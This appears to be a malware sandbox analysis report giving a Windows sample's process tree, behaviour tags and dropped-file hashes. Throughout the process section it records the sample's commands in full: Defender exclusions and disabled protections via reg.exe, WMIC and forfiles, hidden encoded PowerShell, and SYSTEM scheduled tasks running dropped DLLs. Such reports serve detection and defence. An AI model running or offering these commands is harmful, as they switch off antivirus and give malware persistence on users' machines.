C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:644⤵PID:1952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:324⤵PID:1584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:644⤵PID:1212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:324⤵PID:2180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:644⤵PID:1308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:324⤵PID:1592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:644⤵PID:2832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:324⤵PID:2908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:644⤵PID:3012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:324⤵PID:2556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:644⤵PID:3000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:324⤵PID:2204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:644⤵PID:2632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵PID:2608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵PID:2848
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "geIHXerhR" /SC once /ST 00:21:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2752
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "geIHXerhR"3⤵PID:2324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "geIHXerhR"3⤵PID:2428
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1476
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1436
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:936
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 00:45:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe\" 0c /bIFgdidNa 385121 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2456
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZTNkTKukmvvbOMPkn"3⤵PID:2232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 6003⤵
- Loads dropped DLL
- Program crash
PID:1604
-
-
-
C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exeC:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe 0c /bIFgdidNa 385121 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2028 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1068
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:2712
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2200
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:1148
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:2000
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:516
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:876
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2936
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1488
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:436
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2916
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:3052
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2944
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:1608
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:768
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2252
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"3⤵PID:1748
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:596
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:2240
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:2876
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2596 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2856
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2908
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2984 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\zkIMIO.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\WchfhUg.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:420
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ucrVpivlTlXwlAC"3⤵PID:3052
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ucrVpivlTlXwlAC"3⤵PID:2096
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\bifBtEe.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1784
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\GIsfsbD.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1608
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\FMMsqqA.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\ViiciBn.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 00:30:14 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\ClJHMfRP\FlVGcfu.dll\",#1 /PONsdidJpV 385121" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1164
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BjyVbWVaXyfCTlHuI"3⤵PID:2060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"3⤵PID:700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 15123⤵
- Program crash
PID:2736
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\ClJHMfRP\FlVGcfu.dll",#1 /PONsdidJpV 3851212⤵PID:1212
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\ClJHMfRP\FlVGcfu.dll",#1 /PONsdidJpV 3851213⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:1140 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"4⤵PID:2452
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3F9049A4-E151-4328-955F-2EFE76B778DB} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]1⤵PID:1100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:980 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1212
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2292 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2496
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:640 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2532
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2256
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2460
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2348
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5f288dc1e08bdf4ec07e528d58555edf1
SHA17ea87411edcb6fd7a424755fd42db2186db60bb1
SHA256da84e35fe3cfa690d188e8ad090a3cc43b9a6713808e59fee6c25d7b716475b0
SHA5125f9f1a512879b977bad1d9803d14d2d790e2a4631637de023e5bb2c62e371c5b95ba934dad27a93c56035b4f8a5a2a2ad0f972925cd0949cd8f85e87bf843b04
-
Filesize
2KB
MD5ccdaeb115ffc2bbb649a56839557ea3a
SHA1bd5c86877f06d8b1664d5536f0badd57336e0feb
SHA256bbd5df6b642176d94c850a0ae73a2b7a84203c1d4f1e3e8a515b949965c905c4
SHA5124bad6bececf64de9ff596afa56d1425adf1df055fdf1c3289e43f4a49a5a959d254291237c88f6a323dcd6365f65c1dacf65f03da8c49a6ddde3bc76b08e183f
-
Filesize
2KB
MD5a0ca83890132697bd1c6cd05b9c00a37
SHA1520ff6ee5d7569a1685d2a9a2afb8b158776a6d0
SHA256ed27262ef62c4c740bee54b35dfe2878e1ff82f863e9611723d304eb9aead68d
SHA512e98f5db6e2461aa7e257d01fd5018c55b5db2d3a2991fe4943ff867b2bd1ecd40bd003e5c37c923633a8f5e4060daed5125a8106eed9f3a28949c468fae86a46
-
Filesize
2KB
MD542e158f1794e055e944693c96438761e
SHA10ffdc336985d804ac9195051581237e1219de0bd
SHA2563b84f7818d8c5f7ea7ee36fc3c05896eed56922c13f88e959553176db6a64597
SHA512cc39dbdb60cd3171ac6aa216fe31efdd31553c32fa87f61e2371f7e57a886cb43a85b8e6ffc1770a8d8430280641c83f3062fb61284e0315423e72486bb5d416
-
Filesize
2.0MB
MD5c14f91d92ce590f19e4c8f861c4ac94a
SHA1397853b82bf5ec920fdeec336708999d8eef4bd2
SHA256f796f4e5408a2ab68d57c08a5353d0692a65f69f98dd66e7424c5d0f3ef0234c
SHA512754f4935176c53c07b927ecc5cf3e2a9ef86218aedd2e017258b2464324d3b50b26ca670cc073f51a388ef078298b92a56e250acfee45608770e5d074fd5f1bb
-
Filesize
2KB
MD5617d79daf144345bbad41a988cf4e7dd
SHA13261de16057471554d3358190f774e41cc1cba67
SHA256ca6100d84417365828151234c7411b88b11eeb06e89ef5a89e84246845c874bc
SHA51234bfa4d3a509fda4db90bbfbf53bf3ab770be8649c1cf492c830f6def96455c2e849b105330bc3928d5f70204cd57c4a2f9f1a14688e44d8c0ecf458142809d0
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
9KB
MD5875531fe10c3322910f6851b7f374b55
SHA13b5db893f6b4cc708560ba54cb16d285e862e415
SHA256ab676e3c0f603607e1b784bd5f3216bda0e7672ba85ae36398857250555f6dc2
SHA5122cad9f31b7e0333a9953b940271081ab3c3fcbd9e4275f9a765d3300950bd1ef809ec732bb02a17d4a81a60755411fd338cfd328db0ac67ef3755441f02328a6
-
Filesize
27KB
MD5589160343c77df22b0e9d1a4781cc29e
SHA1e2fca682f9f68824d6e1a9e5e7e953958547c9dd
SHA256f47cfc5c5fdf82ee3966800caf84d1bdf651d00cd9fcd867712f44b7437bcf33
SHA512c3bfd58ec08509dda63817c5e1e2a040e5edb73b87438f5529177f1f8dec3212da1b70bfd4972c1631a5f17b907b65ce4a59ce9c4f989ac31bbaa5dcddeb49db
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5547820f73a6c52215af61d6a7c1d74d8
SHA1bf89072ce6a9692dab17c6da46666ad25e4cb585
SHA2564b6cd3f4fada788eb2e823003fb7165f9a8ba7bd22854fed4e4dd3dd11a7635a
SHA51298c46085c3222f967a232bf6cc2e4acd049f1a71daf847fa608990c7dc063eb2831129ba3c9657edb1c2054d384069c0e201c6dcb3a4107845718a38fcae94ed
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5cc3031eca18185de7031b4e4704470a2
SHA170f5ee74dfb470ec4aafd87990d9035b3c388b09
SHA25626961dc83850f4168490d18d2bfae483d92bfac9a12ff3c46d94215537b79776
SHA5123090f0adaa099c3b50e806bccf0030ad85d3be0bae97999df651ffb6f5365ac970da7e161e3a0ad0cee293dacb14e0034bb13128d24a4f0a6dec541286dda694
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD57654ff1caff5ec9d4c19d467cd4cd633
SHA1ee59e801b8c90220e99401ecbc4ab4456803b19a
SHA256d018b6276c4b5138b11ef3b7c3075778a12f3dc9990c13fc6ab439487e69f93f
SHA51219da2348c3b161d7064e25cd9442c08f940200d063a9d07f022919b0b442472e56e250bb673c83369a868b19fa5f856874e1d41287923c73f36c3c94dcbeb55c
-
Filesize
6KB
MD5641cd4cda9e6a63d6ff49466f169bb4f
SHA1d9dea45401d931e44569f7586249bc6b687575d3
SHA256bdf0733822df0cefd3b0f726fdb993e450601829168cf9bbc41f8ad51896bf12
SHA5120387891b53dccc6ba2c53e7c92c9bd04a3b9a438c57cc2571de6abdc2b1110434a08731f697421d40b46743c6c0c266b208233fb170953fb2d100b4bf7f8440e
-
Filesize
6.5MB
MD521e3965bd08eabf0ee24dd9d17dc0d5c
SHA18680d90f50ed3caf0b617a1cf512c664bdbd7be8
SHA256570e0b2d996c3151a08c5042555500988b7eca34c2126d335e06da13ce772f4a
SHA5129b5662e11db22c04c3f4463e493c28b5ef2a7a997e644a6cad8f38d8df2947f8f14b049d0d2136b4e98a53db9db94c5a2ff613b8cdbaa2c7107a46f855c81a3e
-
Filesize
9KB
MD5e3b6fce460d4376c66ddf888dceb2bd0
SHA1a9a54f824d581b6c42c828937222698eadae464d
SHA256a399a8eeac6a0414067798e74d5446bc0a6fed60d379d6f72351d9ecb51431f7
SHA5129bb0e8ff4f3b4657c9f77d185ebe0bcb22e116c41fe99cba79b93e1a1a7528a322c3e77235bde7eef7f34b22c1b55d5bd11fe36cd47d3d8bab566136ff551f1e
-
Filesize
5KB
MD5bf1f631d5d6e9168c9e69deb988eeabe
SHA154a1cc608061f3c9b117f3baaf0e09cedb12b45a
SHA256dbd6846ee4d005d54fc33705ae63914a1b7d08f5e1a9a6ed2bbbda0e36af5188
SHA5127610bb27af030ced451aa5107808448fa5d38979e4a198abd12e959daa9c351daa4c0e919d9c356471415ce5392c5a61e000ffdb2bd9ad7c8b7b507b2aea8cfc
-
Filesize
6.3MB
MD527ac45acebe576d24f84ca8dadc355c3
SHA16640bf3cfa9d0610f3150d45a52f88145c4799e2
SHA25632e6e4acc8ea46841ad65af928c7aff9fcc1224cb5f6ba557c30f8133a440b7a
